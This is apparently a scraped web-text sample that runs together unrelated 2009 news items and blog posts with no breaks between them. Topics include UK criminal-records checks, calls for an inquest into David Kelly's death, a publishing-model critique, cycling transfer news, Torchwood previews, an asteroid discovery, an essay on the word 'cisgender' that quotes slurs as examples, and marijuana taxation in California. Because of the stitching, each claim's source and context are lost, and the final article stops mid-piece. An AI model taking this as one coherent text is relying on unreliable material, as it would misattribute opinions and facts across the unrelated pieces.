It is also a massive undertaking – the 1.5 m people checked in 2002 had gone up to 4 m in 2008 - 09 .
Now , this park lady ( who wishes to remain anonymous ) was the victim of the enhanced criminal records check – the standard check , everybody agrees , is almost totally unproblematic .
It passes on only current and spent convictions , cautions , reprimands , and warnings – which proceed from an admission of guilt ( to be cautioned you have to accept a caution ) .
A standard CRB check can also access List 99 , a register of people who have been barred from working with children – but basically this check is not open to tittle - tattle .
Furthermore , and I believe more important , the CRB is on target to process 95 % of its standard - check applicants within 10 days .
The enhanced check , conversely , has come to the attention of Liberty – and not just on behalf of the park lady – because it can include , above and beyond that raft of convictions and warnings , " relevant and proportional information held on that individual " , as decided by the chief officer of police .
This really could be anything .
People are warned when they put in for an enhanced check that it could even flag up other people living at their address .
As another for - instance ( if you are of a mind that one should n't go to the shops while one 's children are in the park ) , say you have a very loud argument with your partner , and a neighbour calls the police : this information will be logged even if you personally do n't make a complaint , and rightly so , because the police are thereby alerted to respond maybe fractionally faster if you were to make a 999 call .
But say this is n't domestic violence , and it 's just a very loud argument – it will still end up on your CRB check .
This has now entered the realm of gossip : it will be passed on to a prospective employer with no warning to you .
When you do find out , you have no right to get it struck from your record ; and if your application was for a job in a domestic violence refuge , for instance , you might well find yourself considered unsuitable to work there .
Worse to my mind , however , is the sheer bureaucracy of the enhanced check – the bureau has targets of 90 % of applications being processed within 28 days .
That sounds good , but it is missed in 10 % of cases .
And in the Metropolitan police area applicants are quoted six to eight weeks .
Moreover you have to re-apply every time you change jobs ; or every three years , and after maternity leave , if you stay in the same job .
In summer the system is slower because teachers are all being vetted .
This is no victimless matter – people in these " caring professions " are left without income , or even the means to bring in a temporary income , for weeks at a time .
Bear in mind that working with children or vulnerable people is rarely well paid in the first place , and you have a system with unjust financial penalties built into the very bureaucracy .
The gossip element will , I believe , be ironed out in time , especially as a new vetting and barring process will be introduced in October that should in the long run obviate the enhanced check .
But the way people are treated by government agencies – this high - handed , " well , we do most of you in a month , what are you complaining about ? " attitude – is astonishing to people who work outside these altruistic sectors .
The Conservatives might have a much bigger vote - winner with their anti-surveillance crusade than it initially appears .
Dr Kelly was a weapons inspector in Iraq Campaigning doctors have called for a formal inquest into the death of government scientist Dr David Kelly .
They have produced a report arguing an earlier finding of suicide was flawed .
Dr Kelly 's body was found six years ago near his Oxfordshire home after he was exposed as the source of a BBC story on the grounds for going to war in Iraq .
Instead of a coroner 's inquest , then Prime Minister Tony Blair asked Lord Hutton to conduct an investigation , which found Dr Kelly killed himself .
Lord Hutton 's inquiry found the 59 - year - old died from blood loss after slashing his wrist with a blunt gardening knife .
' Flawed '
But according to the team of 13 specialist medics calling for a new inquiry , the cut was " highly unlikely " to have caused enough bleeding to kill Dr Kelly .
The previous examinations into Dr Kelly 's death were " flawed " , said retired consultant in orthopaedic and trauma surgery , David Halpin .
Mr Halpin said Lord Hutton was charged with inquiring into the circumstances surrounding the death , but not the cause itself and his inquiry had lower legal standards than a coroner 's inquest .
I think it 's highly likely he was assassinated
David Halpin
" Due process has been subverted , " Mr Halpin said .
" The group that I am part of is not prepared to let that go .
There is evidence of a cover - up . "
Mr Halpin described Dr Kelly as a " skilled " and " courageous " man who deserved a " proper inquest " .
He said : " He was a very prominent germ and chemical warfare expert .
That is relevant because of his knowledge of the biology of death .
" He had spent 10 years at Porton Down [ a government laboratory ] and he knew everything about killing things .
' Outstanding work '
" So to take what was said to be a blunt knife and what was alleged to be his wife 's co-proxamol tablets to try to kill himself is extraordinary .
" I think it 's highly likely he was assassinated . "
The doctors ' report explaining their rejection of the theory Dr Kelly died from cutting his wrist will be sent to Sir John Chilcot 's forthcoming inquiry into the Iraq War.
Liberal Democrat MP
Norman Baker , who published a book about Dr Kelly 's death two years ago , backed the doctors ' campaign .
He said : " There are three aspects of 2003 which need to be put to bed .
" There needs to be a proper inquiry into the Iraq War ; there needs to be a proper inquest into Dr Kelly 's death ; and there needs to be some recognition of his outstanding work .
" All we are asking for is proper legal process - we have not had it yet . "
Bookmark with : Delicious
Digg
reddit
Facebook
StumbleUpon
What are these ?
E-mail this to a friend Printable version
Richard Nash 's Gated Publishing Communities
Richard Nash , former head of Soft Skull Press , no longer believes you can sell digital books .
Instead , he wants to construct online cities and tax the citizens , creating gated communities of readers and writers who have the same broad preoccupations and aesthetic preferences .
From Nash 's " Publisher 's Weekly " article about his new model , a system he is calling " Cursor " : " Were it not for the power of the Internet , all this talk of the social nature of reading and writing might remain just casual , useful little thought bubbles built around books .
But especially in the Web 2.0 incarnation , which focuses on communication and sharing , technology has emphasized a simple truth at the heart of my new enterprise : we are what we read , we are what we write , and we organize ourselves around and connect with one another through what we read and write .
"
In addition to selling books while he still can , Nash wants to offer paid memberships for readers into writer communities , memberships which will let readers upload their own writing , join peer - to - peer writing groups , get access to " recommendation engines , " contact established authors online and in person , and get editorial assistance in the form of both professional and peer advice .
Just like Amazon 's self - publishing model , except with smaller distribution .
" Other revenue opportunities include the provision of electronic distribution services to other publishers ; fee - based or revenue - share software modules , especially for online writing workshops or seminars for publishers , literary journals , teaching programs ; fee - based linking of writers to suppliers of publishing services , including traditional publishers and agents ; corporate sponsorships and site advertising ; and events and speaking fees .
" A contract with a Cursor community as a writer will last three years with an option to renew , and they will get all your rights : your digital rights , your print rights , maybe even your adaptation rights .
Getting published by a Cursor imprint will be like getting elected Mayor of Booktown .
You will join a community because you like the things they already publish and feel like the members are " your sort of people . "
Then , you will upload your work , get it reviewed and edited by peers who are also trying to build clout and credibility , and try to win the popular vote of your fellow citizens .
If you manage to get elected and secure a publishing contract , then you will have unlimited access to all of Booktown 's publishing resources .
Your own office !
Your own secretary !
Hot cha !
" The business will focus on developing the value of the reading and writing ecosystem , including the growth of markets for established authors , as well as engaging readers and supporting emerging writers .
" These cities will be either built along profitable veins of rare ore ( venerable established writers ) or near large bodies of water ( powerful , popular genres ) .*** Things with which I respectfully disagree : ( 1 ) .
Reading is social .
Reading is social like porn is social .
You do n't really want to hang out with people who like the same porn you do .
You want to believe that the porn is for you and you alone . ( 2 ) .
You can't sell digital books .
See " Wunderkammer Seeds : A Fantasia " ( 3 ) .
Good writing comes from nurturing communities .
I guess this is how " creative writing " programs stay in business .
But it 's a goddamn lie , so one hopes that these Cursor communities will attempt to solicit outside submissions .
Insular communities create insular ideas , and most good writers are natural - born outcasts , unable to persist within insular communities for very long without fucking shit up .
while good writing sometimes occurs as a result of competition provoked by hate and rage generated by these communities , these are difficult elements to lock into a social network . ( 4 ) .
People will pay for this .
They wo n't .
( 5 ) .
Writers want to be Mayor of Booktown .
Writers want fame , riches , glory , and more worship than corrupt Roman emperors .
They need to believe this could happen from the power of their simple stories .
Sometimes it DOES happen .
If you eliminate this hope , you eliminate the spirit that drives creative agony . ( 6 ) .
The internet is magic .
The internet is not magic . ( 7 ) .
You will be able to compete with Facebook , Amazon , and Google as an online content aggregator ....*** I respect Nash 's insights , and I hope there will be a huge land rush for property within his special reading cities .
I want him to prove me wrong ; to reinvigorate publishing , create new readers , and get my generation excited about imaginative prose .
I fear that " social networking " is only a very small part of the puzzle .
Publishing companies need to build better digital products , plain and simple .
They do n't need new " tricks . "
Most likely , modern publishing companies are going to go out of business and be replaced by people who know how to write interesting and innovative code .
Writers will do business with the publishers who can do the most digital voodoo with their narratives .
If publishing is digital , then hackers are the new press .
World Champ Ballan likely to join USA 's BMC team ( Image credit : Sirotti )
World Champion Alessandro Ballan will ride for USA 's BMC Racing Team in 2010 .
He leaves top division Lampre after six years and , according to La Gazzetta dello Sport , will join second division BMC .
" I want to go abroad to learn English and see a new world , " Ballan told La Gazzetta dello Sport .
Italy 's Ballan , 29 , became professional with Giuseppe Saronni's Italy - based Lampre team in 2004 .
" I will not stay with Saronni because I want to better myself .
It has been good in this team , very good , and I still have some big goals : repeating Worlds and Lombardia .
But to stay another two years would be too much . "
Ballan said he still has to decide where he will ride in 2010 and will wait for the right day to announce it .
The UCI prohibits teams and riders negotiating prior to September 1 , tomorrow .
" Tomorrow I will know more about my future , " Ballan told Cyclingnews .
" At the moment I have not signed with anyone . "
BMC is a second division team , or Professional Continental , based in California , USA .
The team came about in 2008 from the ashes of team Phonak , with John Lelangue continuing as director sportif .
It has to rely on wild card invitations to the top races since it is not a top division , or ProTour team .
This year the team raced the Dauphiné Libéré and one - day Classic Paris - Roubaix , one of Ballan 's career goals .
" It 's true that BMC is not a ProTour team and has to have invites .
But Cervélo showed how it is done this year , " he told La Gazzetta dello Sport .
" You need to have good riders and the invitations will arrive .
BMC also has [ George ] Hincapie , [ Marcus ] Burghardt and [ Karsten ] Kroon , no ? "
BMC 's signings are unconfirmed , but it is also interested in Steve Morabito and Michael Schär , according to a Cyclingnews source .
Ballan established himself as a one - day rider with wins in the 2005 Trofeo Laigueglia and 2007 Ronde van Vlaanderen .
Last year he finished fourth in Ronde , third in Paris - Roubaix and won the World Championships .
A virus forced him to miss much of the early season this year .
He won a stage and the overall at the Tour de Pologne earlier this month .
It was his first race in the World Champion rainbow jersey .
Ballan started the three - week Vuelta a España stage race on Saturday .
He is using the race as preparation for the World title defence , September 27 .
After waiting over 14 months , tonight we finally get the next installment of Torchwood !
Instead of a 13 - episode full season , we ’re getting a five - part mini-series entitled , “ Children Of Earth ” .
This storyline airs over five consecutive nights – July 6 through 10 on the regular BBC , and July 20 through 24 on BBC America .
It ’s disappointing that we only get five episodes , but I guess it ’s better than nothing .
Below is a trailer for “ Children of Earth ” .
If you ca n’t see the embedded video , please click here .
Here are previews for each episode , including SPOILERS .
This information comes from io9 .
Remember , SPOILERS below .
You were warned .
Day One :
An ordinary day becomes one of terror , as every single child in the world stops .
A message is sent to all the governments of Earth : “ We are coming . ” But , as a trap closes around Captain Jack , the sins of the past are returning and long - forgotten events from 1965 threaten to reveal an awful truth .
Torchwood is forced underground as the government takes swift and brutal action .
As members of the team are hunted down , Britain risks becoming a rogue state .
Meanwhile , the mysterious and powerful 456 draws ever - closer .
Captain Jack , Gwen and Ianto are helpless as events escalate to such a degree that mankind faces the end of civilization itself .
Day Two :
As the new Torchwood adventure continues , the team is forced underground when the government takes swift and brutal action .
With members of the team being hunted down , only Lois holds the key to Torchwood ’s salvation .
But she is helpless as her superiors make plans for the mysterious Floor 13 .
Day Three :
The eyes of the world turn to Britain , as the 456 announce : “ We are here , ” as the new Torchwood adventure continues .
As a pillar of fire descends upon London , the members of Torchwood must battle to protect their own families as the fight gets personal .
But will Clem ’s memories destroy everything ?
Day Four : Torchwood finally learns the truth about the events of 1965 , as the adventure continues .
But Britain is in danger of becoming a rogue state , and everything now pivots around John Frobisher , as the Ambassador of the 456 destroys its old allegiances and reveals its true intent .
Day Five : Torchwood is defenseless and Gwen Cooper stands alone , as the final sanction begins , in the last part of the new Torchwood adventure .
As violence erupts and the world descends into anarchy , an ordinary housing estate becomes a battleground , where the future of the human race will be decided .
Sounds great !
I ca n’t wait !
After making your poll choice , please post your opinion and thoughts about this new discover by IIT Bombay researchers that homeopathic remedies up to 200C have been found to carry nanoparticles of the original drug substance .
Can this discovery explain how homeopathy works ?
What would be its repercussions ?
Triple Asteroid System Triples Observers ' Interest
Status Report From : Jet Propulsion Laboratory
Posted : Thursday , August 6 , 2009
Radar imaging at NASA 's Goldstone Solar System Radar on June 12 and 14 , 2009 , revealed that near - Earth asteroid 1994 CC is a triple system .
Asteroid 1994 CC encountered Earth within 2.52 million kilometers ( 1.56 million miles ) on June 10 .
Prior to the flyby , very little was known about this celestial body .
1994 CC is only the second triple system known in the near - Earth population .
A team led by Marina Brozovic and Lance Benner , both scientists at NASA 's Jet Propulsion Laboratory in Pasadena , Calif. , made the discovery .
1994 CC consists of a central object about 700 meters ( 2,300 feet ) in diameter that has two smaller moons revolving around it .
Preliminary analysis suggests that the two small satellites are at least 50 meters ( 164 feet ) in diameter .
Radar observations at Arecibo Observatory in Puerto Rico , led by the center 's director Mike Nolan , also detected all three objects , and the combined observations from Goldstone and Arecibo will be utilized by JPL scientists and their colleagues to study 1994 CC 's orbital and physical properties .
The next comparable Earth flyby for asteroid 1994 CC will occur in the year 2074 when the space rock trio flies past Earth at a distance of two - and - a - half million kilometers ( 1.6 million miles ) .
Of the hundreds of near - Earth asteroids observed by radar , only about 1 percent are triple systems .
// end //
More status reports and news releases or top stories .
Please follow SpaceRef on Twitter and Like us on Facebook .
Please enable JavaScript to view the comments powered by Disqus .
An Important Message About Vocabulary
While I do have a particular instance in mind , this little epistle is really in reaction to several comments , essays , loaded questions , and diatribes I 've seen over the past three or four weeks in various places ( though I had n't seen it blow up into a shouting match anywhere until a couple of days ago ) .
Note that if you do n't know what the verb ' to other ' means , or how the umbrella term ' transgender ' is used , you may have some homework to do before getting into this .
I expect that most of my readers already know those concepts .
[ Minor edit to fit use of ' cisgender ' instead of ' cisgendered ' to current accepted style . ]
Folks , ' cisgender ' 1 and ' cisssexual ' really are intended to be neutral terms and will be so until / unless some sort of general stigma gets attached to the concept of living / identifying / presenting as the gender society always expected of you because it was on your birth certificate .
I do n't see that ever being likely .
( I have a hunch that I 'll be responding to a lot of criticisms of this essay by pointing back to this very pragraph , starting at that " until " . )
It 's important to note that there 's no reclaiming of an old slur involved , nor repurposing of a word with other baggage , because ' cisgender ' was coined specifically for this meaning and this purpose , and was n't a word before that .
Any baggage the word has now has to have accrued entirely over the last decade and a half .
( ' cisgender ' , from ' cis - ' , " on the same side " , + ' gender ' ; in contrast to ' trans - ' , " crossing over " ; both from Latin , and both prefixes used in Chemistry with similar meanings . )
The reason it feels jarring -- " naming " ?
" marking " ? -- to you , and gets your hackles up is quite simply that y'all are accustomed to being the unmarked class , and giving you any concise name is going to feel like an imposed label that , because you 're not used to having to acknowledge a label at all , some of you start to suspect is somehow insulting or denigrating .
" gender is like underwear : if it fits ya do n't notice .
If it does n't , you can't avoid noticing " -- 2009-06-30 -- LaughrioTgirl
Stop a minute and ponder for a moment the magnitude and type of privilege that is contained in not having to think about or acknowledge a label .
Compare that to TVs , TSes , DQs , DKs , GQs , and all other subgroups of transgendered people .
You do n't like it ?
Pick and popularize a different label , but pick one that does n't stigmatize everybody else in contrast to it .
That you now have a label does n't ' other ' you ; it merely makes you like everybody else who has a label .
If one group gets to insist on not having a label , that ' others ' everyone else .
If we remove the " default class " from you , that loss of privilege you have a gut reaction to is n't because you 're being insulted ; it 's because the field just got a tiny ( tiny ! ) bit more level .
( Here 's a big hint : ' normal ' and ' real ' fail the does n't - stigmatize - everyone - else condition spectacularly .
Prefixing ' man ' /' woman ' with ' bio - ' or ' genetic ' or ' born ' to denote not - trans , ' others ' the rest of us slightly more subtly , but only slightly , and no less problematically .
Either respect us , be an ally , and use non-othering language ; or admit up front that you do n't respect us -- that holding on to your privilege is more important than supporting us -- so we can classify this as a variation on the " tone argument " and write you off as Part Of The Problem . )
[ 1 ]
While I learned ' transgendered ' as having ' - ed ' on the end to make it an adjective ( and applied the same pattern to ' cisgendered ' ) , within the trans community you will find most now insist on ' transgender ' and ' cisgender ' as adjectives themselves , without an ' - ed ' suffix .
If you see the ' - ed ' versions , they mean the same thing but are an older form .
Othering And Non-Othering Labels
Othering | Not ( or Less ) Othering Unmarked 2 Marked | Equally Marked Equally Marked normal southpaw | right - handed left - handed straight kinky | vanilla kinky straight queer | het gay , lesbian , bi
' queer ' sometimes works here as well faithful poly | monogamous polyamorous regular guy geek | lay user techie normal deaf | hearing deaf real woman tranny | cis woman trans woman bio -man transman | cis man trans man [ 2 ]
I 've labelled one member of each row " unmarked " , though they 're obviously no longer completely unmarked in a list like this , since they have acquired one or more form of normalcy tag as a result of the ' other ' being talked about .
In many situations these are literally unmarked however , so that the Other is assumed to be entirely absent unless specifically mentioned by label .
This table illustrates othering combinations of labels , and non-othering or at least less othering pairs .
Note that it is generally the name for the unmarked state , and its implications of being normal / default / good / real , rather than the name for the marked state , that makes the unmarked / marked pairings problematical and othering .
' rightie ' /' southpaw ' would be fine , because the problem with the first example is n't the word ' southpaw ' , it 's the claiming of right - handedness as the unmarked state .
The problem with ' normal ' /' regular ' / ' real ' should be obvious ; the flaw with ' straight ' may be less so .
If that 's the case for you , consider how many different layers of meaning there are on the word ' straight ' : pure ( unadulterated ) , honest ( not crooked ) , undamaged ( not bent ) , sober ( not using drugs ) , clear ( not confusing or obfuscating ) .
Now reconsider what message you 're sending by defining your class as ' straight ' and some other class as not - straight .
( I did not get this myself until a stranger took me to task for using ' straight ' to mean ' het ' , and even then my first instinct was to get defensive about it instead of thinking about what his point was . )
Note also that some of the marked / unmarked pairs have problems of inaccuracy as well !
Many people who do not identify as polyamourous , are not in explicitly polyamorous relationships , and even sneer at poly folk for being immoral , cheat on their partners .
And many members of polyamorous N - ads are faithful to the promises they 've made to each other .
A " genetic woman " ( an older usage that I do n't hear as often nowadays ) usually only knows her exact chromosomal makeup if something goes wrong that leads to a test -- we just assume that babies who look female and grow up to be women are XX because that 's most likely , but we do n't check ... and a few transsexual individuals discover along the way that they are n't the XX or XY their parents had assumed they were ( for a particularly well known example , see Caroline Cossey , who is chromosomally XXXY ) .
Another set of terms , the cumbersome ' FAAB ' and ' MAAB ' meaning " female - assigned at birth " and " male - assigned at birth " , attempt to sidestep that problem by digging down to what we usually mean to refer to anyhow : whether the parents were told , " congratulations , you have a daughter , " or , " congratulations , you have a son , " when the individual was born .
Even " bio - " is n't a very meaningful label , since all humans are still biological , trans or not .
Note that while ' FAAB ' and ' MAAB ' are useful in certain contexts when discussing the ideas of sex and gender abstractly , when used casually outside of that context they still reveal too much emphasis on the idea that initially - apparent biology = destiny , and can be used as sneakier ways of saying " real man " or " real woman " for cisgender in order to exclude trans individuals from gendered spaces .
Othering | Not Othering Unmarked Marked | Equally Marked Equally Marked real woman trans woman | woman woman bio-man transman | man man
Finally , note that in most everyday contexts -- that is , normal social encounters and conversations and most policy matters , not specific medical or research or rights - activism contexts -- an even better version of the last two rows of the table would look like this version to the right --->
... but alas , I know there 'll be a lot of pushback on that , from various quarters .
Some of which really ought to know better .
( There are some valid concerns there , and the conflict between different sets of rights and needs can be tricky to resolve , but more often the opposition to this idea stems from simple , conscious or unexamined cissexism . )
About Neutral vs. Non-Neutral Terms :
This started off with my observation of some same - gender - the - delivery - room - doctor - thought - they 'd - be people 's objections to being called ' cisgender ' , and complaining that it felt like a pejorative term ( and one they had n't chosen for themelves ) .
So let 's compare some value - neutral terms to some negative ones .
Value Neutral
or pretty close Disparaging Or Worse gay man , lesbian fag , dyke , pansy , lezbo heterosexual , het breeder parent breeder person of color [ I 'm sure we can all come up with far more examples to go here than we need , and I really do n't even want to type most of those words ] indigenous peoples savages Arab towel - head Christian Jesus freak ,
God -botherer fundamentalist Christian funnymentalist ,
Bible - thumper fundamentalist with OT emphasis Levitican atheist , apathist Godless heathen Republican Repug , Rethuglican left - winger moonbat transgender person ,
transsexual tranny 3 , shemale , he - she , it cisgender person ,
cis person cissie or cissy 4 [ 3 ]
N.b.!
There is ongoing debate within the T* community over the use and attempted reclaiming of this word by trans men .
Many trans women feel that since the negative use has mostly been directed at trans women and also used against any woman the speaker deemed " not femmy enough " ( or in at least one case that comes to mind , for just being wrongheaded and mean - spirited despite being gender - conforming ) , it is therefore not trans men's word to reclaim . [ 4 ]
I 've never heard these in the wild .
And , significantly , the only real sting in them comes from being homophones of ' sissy ' -- by suggesting a meaning very different from their actual root !
The examples I 'm giving here may become dated as language shifts , and may even already be subject to differences in regional usage .
There is a sort of euphemism treadmill for some terms so that the more - polite phrase gradually accrues all the negativity of the original epithet and needs to be discarded for a new euphemism ; and there 's ' reclaiming ' , by which some terms lose their stigma and become mostly neutral barring tone - of - voice cues .
( Also , at least with the T * community , when the community was much younger and still discovering / inventing apropriate and useful language , it embraced terms that were later realized to be troublesome .
So if you read older texts , you may see trans folk casually phrasing things in ways that would attract flames today .
We were -- are -- still learning and evolving . )
Bear in mind that even some of the neutral terms can be suspect if used when there was no reason to bring them up in the first place .
But in my dialect at this time , I think this is a useful illustration .
Here 's the thing : if we meant to be insulting or disparaging in our choice of word for people who are not transgender , you 'd know .
It would n't be this nagging discomfort over finding yourself in a marked class and worrying about having a label at all for a change .
It 'd be a proper insult .
( And as people have noted elsewhere , expressing exasperation with an individual member of a class does not make the name for that class into a derogatory term .
It 's possible for a T* person annoyed at a cis person 's abuse of cis privilege to call them a thickheaded , bigoted cis person without making ' cis ' the insult ; it 's the first two adjectives that are negative , not the identifier at the end .
In the same way , someone can refer to " an evil man " without making ' man ' into a derogatory term , because the negativity is in ' evil ' , not ' man ' .
So just because you 've heard a trans person complain about a cis person , that is not enough to serve as an example that " ' cis ' is used pejoratively " . )
Similarly , I 've seen plenty of men try to argue that a woman who has said anything negative about one man or an identified subset of men must hate all men ( therefore her opinion can be ignored ) , white people who 've cried ' reverse racism ' when a person of colour has called them on their bullshit ( therefore PoC are " just as bad " and their complaints can be disregarded ) , and countless cases of would - be allies complaining they feel attacked when a disprivileged person has complained about specific actions of some members of the group the would - be ally is a member of ( and therefore the minority group is about to " lose an ally " because they were " mean " ) .
Tone Argument , " it 's all about me " , and strawman " you people are just as bad " , are derailing .
Fifteen yards and loss of down .
Do n't go there .
And yes , some of the negative words can be used by members of the communities they 're applied to , either as an early stage of reclaiming or because they have different connotations when used ironically by people who have a stake in those words .
That 's really a large enough matter on its own to warrant a separate essay .
For our purposes here , consider uses of the words by a random cashier , cop , or passer - by who is not a member of the described group and is n't already a friend of the listener who is a member of that group .
If you pull out the " Well , I heard some _____ people saying ______ once so it does n't belong on the bad list , " in this context , that 'll be a five yard penalty for distraction .
That is , it 'll put you farther away from making your case , not closer .
We can have the discussion specificaly about that phenomenon elsewhen .
( I should probably note discussions elsewhere regarding ' person with attribute ' vs. ' adjectived person ' vs. ' just a noun ' labelling styles -- e.g. " person of colour " vs. " coloured person " vs. " black " ( or other ' racial ' marker used as a noun ) ; or " person with diabetes " vs. " diabetic person " vs. " diabetic " .
Even a cursory examination of that topic would be too much of a distraction right here , but it 's something that folks preparing to discuss labels should at least be aware of . )
If this sounds like I 'm saying you have to agree with me to be allowed to speak , do a Google search for privilege bingo card and see how many of these " clever " arguments have been used so many times , regarding sexism , racism , ablism , poverty , and pretty much every other topic that involves a group struggling to be treated decently , that the very existence of these tactics has become a bitter joke .
The rule is n't that you have to agree with me ; it 's that you have to fight fairly and argue in intellectually honest ways , rather than adopting the tactics of oppressors while claiming to be on my side .
A Significant Distinction :
" wtff ?
" Now can het people jump in and declare they are insulted by being called ' het ' or ' straight ? ' or can i cay 'i never really agreed to be called ' white ' so it 's insulting ?
and if not , what 's the fucking difference ? " -- maevele , 2009-06-29
An argument I 've heard is that since we transgender people get to tell others what labels to use for us and which words are unacceptable , cisgender people should not have a label forced upon them .
But we never got to choose whether to have a label ; we only got to argue about which labels we did n't find insulting .
The ' cis ' debate appears ( so far ) to be about whether cis - folk should be given a label at all , which is hard to see as anything other than default - class privilege .
You do n't get to hold on to being " just plain [ unmarked ] men " and " just plain [ unmarked ] women " and not have a label for your class , because that continues to promote the idea that trans men and trans women are n't really men and women .
I sure hope that you can understand why trying to stop that meme is important enough to risk pissing off some folks we'd been on good speaking terms with before they started insisting on turning back the clock .
" I 'm giving up on using the words man and male because in a patriarchy , it 's the default assumption behind human , just as cissexual / cisgender is the default assumption behind man and woman .
" So , instead of men and women , we 'll have humans and women .
" There , now we can avoid offending men , er , I mean humans . " -- timberwraith , 2009-06-29
So here 's the deal .
I obviously do not speak for transgender people as a whole -- to be precise , I speak for nobody but myself -- but if instead of complaining about having a label , you propose a label you like better than ' cis ' /' cisgender ' , a label that does n't start with ' a - ' , ' an - ' , 'un -' , ' non -' , or ' im - ' and does n't simply translate as " real " or " normal " , and you get a significant portion of the not - transgender people who are engaged in conversations with trans folk about language to agree that the word is a candidate worth discussing ( I 'm not asking for a majority of that group , just enough that we 're not having the same conversation eighty zillion times with a different word that has only one supporter each time ) , I 'll listen , and I think some other T *people will as well -- we I may still have criticisms of the label you choose , and / or helpful feedback ; I may wind up pointing out that you 've still left in ' othering ' aspects that demean trans people ; but I 'll listen and discuss and you really do have a shot at convincing me to try to get others in the community to use your word instead of ' cis ' if it really is a neutral term ( i.e. , not just a sneakier way to reassert cis privilege ) .
Oh , there 'll be pushback from some quarters even if its a great word , because some people just hate having to learn new words and habits ( just look at the number of people who 've used , " we do n't need a new word " as an excuse to oppose ' cisgender ' over the years !
Or to step back farther in time , the men who used similar excuses for not wanting to use ' Ms. ' when asked to ) , but bring labels you find respectful and acceptable that do n't just go back to denigrating trans folk in contrast , that do n't cast us as ' other ' to your ' real ' , and there 'll be a real conversation and maybe -- I hope -- a meeting of the minds .
But as long as what I 'm hearing is , " Waah , I do n't want to have to have a label , " or , " I do n't like ' cis ' but wo n't suggest something better , " you can shut the [ expletive ] up .
Because that 's not a polite request for the right to choose your own nomenclature , it 's just incredibly privileged whining about suddenly being treated like everybody not of the default class .
And clinging to your privilege at my sisters ' expense does n't make you much of an ally .
And my transgender brothers and sisters ( and bi-gender , agender , and polygender siblings - in - arms ) can hear that too , and most are n't just going to roll over and say , " Oh sure , unmarkedclass , we 'll other ourselves just because you say it 's impolite to try to be equally valid to you . "
While y'all are feeling butthurt about being handed an adjective ( and not knowing which pocket to put it in ) , there are a lot of trans people busy just trying to get consistently recognized as human instead of being considered piñatas / targets , fetish objects , scapegoats , and comedy props .
Bring it .
Bring the suggestions .
Get a real conversation about this rolling .
Until then , I 'm going to continue using ' cisgender ' unapologetically unless someone can show me why it really is offensive beyond existing as a label at all .
This essay is a rant rather than a conversation , a shout at a bunch of whiners - for - privilege , but it's also an invitation to start a conversation if there really is a meaningful conversation to be had .
I 'm not saying , " Here 's your label , like it or suffer " -- rather , I 'm saying " If you do n't like it , suggest something better . "
Show me there is a real basis for a conversation .
Or quit complaining .
Either way works for me .
Some people will read this who have already progressed beyond this stage , with or without input from me .
You should be able to figure out whether you 're one of the people I 'm yelling at or not .
If you 're offended because I yelled at all , then even if I was n't yelling at you when I started , I might be once I find that out .
Denise Yost
NBC4i
August 12 , 2009
[ efoods ]
An elderly woman with a weapon was taken to the ground by a Whitehall officer — and the incident was caught on tape .
Now , video of the incident has created new problems for the local police department as citizens from around the country question the force used .
The cell phone video ended up on YouTube — and the local police department said it has changed the way they work , NBC 4 ‘s Mike Bowersock reported .
Virginia Dotson was wandering the Walmart parking lot at 3657 E. Main St. the evening of Aug. 1 with a steak knife .
She was telling strangers she would cut them and already had cut herself .
Whitehall officers were called to the scene , but some witnesses said officers used too much force in subduing the woman .
Read entire article
The Emergency Election Sale is now live !
Get 30 % to 60 % off our most popular products today !
The couple 's picture was used with a false testimonial A US company has apologised after featuring a Welsh couple murdered on their Caribbean honeymoon as " happy customers " - a year after their deaths .
Friends of Ben and Catherine Mullany , both 31 were shocked to see a photo of them being used with false names to advertise internet company MyDishBiz .
The couple , from Pontardawe , near Swansea , were shot dead at their holiday bungalow on Antigua last July .
The company has removed the photo and apologised to both families .
The picture used on the site was taken in the run-up to the couple 's wedding near their south Wales home a year ago this weekend .
Next to the picture of the smiling couple was a false testimonial from " Frank and Mary from New York " .
Deepest apologies are extended to the families of the victims .
Our company did not knowingly include the picture of the deceased on our website
Company spokesman
The photo was downloaded from an internet tribute to the couple murdered two weeks after their wedding a year ago then used alongside the bogus testimonial .
The testimonial said : " We have made $ 1,080 alone with your MyDishBiz internet business opportunity .
" We are very happy with this program .
This is the best opportunity we 've seen online ever .
Thanks again . "
Mrs Mullany , who was just completing her training to be a doctor , and her new husband trainee physiotherapist Ben were on the last day of their Caribbean honeymoon when they were shot in a bungled robbery attempt .
The couple married a year ago this weekend Internet company MyDishBiz based in Wintersville , Ohio , has removed the photograph and apologised .
A spokesman said : " We are trying to track down who sent the testimonial and picture for inclusion on our website .
" It may have been a disgruntled affiliate or someone who has a very warped sense of humour .
" Deepest apologies are extended to the families of the victims .
Our company did not knowingly include the picture of the deceased on our website . "
Two local men , named as Avie Howell , 18 , and Kaniel Martin , 21 , are due to stand trial charged with the murders in Antigua .
Bookmark with : Delicious
Digg
reddit
Facebook
StumbleUpon
What are these ?
E-mail this to a friend Printable version
It has been touted as a successful treatment for everything from insomnia and depression to Parkinson 's disease and multiple sclerosis .
Now supporters of legalised marijuana are making perhaps their most extravagant claim yet : that the drug can solve California 's spiralling financial crisis .
A series of television ads was launched yesterday supporting a bill by Democratic assemblyman Tom Ammiano that would regulate and tax the sale of marijuana in the Golden State , where Arnold Schwarzenegger 's administration is in a $ 26bn ( £ 15.9 bn ) black hole .
The 30 - second film features an " actual marijuana user " .
She is a retired , 58 - year - old civil servant called Nadine Herndon , shown in front of her family portraits at home in Sacramento County , where she began using the drug after suffering a series of strokes three years ago .
Download the new Independent Premium app Sharing the full story , not just the headlines
" Huge cuts to police , schools and healthcare are inevitable , due to California 's budget crisis .
Even our state parks could be closed , " she says .
" But the Governor and legislature are ignoring millions of Californians who want to pay taxes .
We 're marijuana users .
Instead of being treated like criminals for using a substance safer than alcohol , we want to pay our fair share . "
The move could attract widespread support in a state where some regions never quite emerged from the Summer of Love .
Medical marijuana use was introduced in California by a majority vote in a 1996 referendum , and Mr Ammiano 's bill calling for legalisation was put before the legislature in February .
Highlighting the financial benefits of legalisation represents a canny tactic .
California has for years been unable to raise as much tax as it spends , and its coffers finally ran dry last week , meaning the government is now paying bills with IOU notes .
On Monday Mr Schwarzenegger 's administration suffered the indignity of having its credit rating downgraded to BBB .
Tens of thousands of public servants have been sacked due to the crisis , and most others are being forced to take two unpaid days ' leave each month .
Ms Herndon 's advert , which was launched by the Marijuana Policy Project ( MPP ) , claims that taxing marijuana could pay the salaries of 20,000 teachers .
That figure is based on a calculation by Betty Yee , the head of the California tax collection board , who has said that $ 1bn per year would be raised via a $ 50 - per- ounce fee charged to retailers , plus an additional $ 400 m through sales tax .
